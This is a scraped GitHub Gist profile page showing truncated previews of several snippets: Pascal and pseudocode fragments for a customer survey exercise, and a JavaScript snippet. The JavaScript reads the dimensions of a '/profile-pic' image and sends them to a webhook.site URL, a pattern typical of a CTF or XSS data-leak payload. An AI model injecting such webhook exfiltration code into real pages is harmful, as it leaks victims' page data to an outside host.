Skip to content

Instantly share code, notes, and snippets.

View FranDSchz's full-sized avatar
😄

Franco D. Sánchez FranDSchz

😄
View GitHub Profile
(function() {
// Usamos un try/catch por si la imagen no carga a tiempo
try {
const img = document.querySelector('img[src="/profile-pic"]');
const tempImage = new Image();
tempImage.onload = function() {
const level = this.naturalWidth * this.naturalHeight;
// REEMPLAZA CON TU NUEVO WEBHOOK
fetch('https://webhook.site/95acbc83-95c2-4a27-b14e-77813df6c636/?level=' + level);
};
program Escenario6B;
uses crt;
var
condicion,fechaOp,calServ,calCompra,motivo,motivoNoVolver,segurencias: string;
probIdent,ultCompra,opcion: char;
contP1, contP2, contP3, contP4, contP5,mas1Anio,cantClientes,mayor: integer;
porcentaje : real;
PROCEDURE mostrarDatos();
ACCION ESCENARIO_6 ES
USOS crt, sysutils; //(librerias de pascal)
TIPOS
fecha = REGISTRO
anio : N(4);
mes : 1..12;
dia : 1..31;
program ESCENARIO6;
USES crt, sysutils;
TYPE
fecha = record
anio : integer;
mes : 1..12;
dia : 1..31;
end;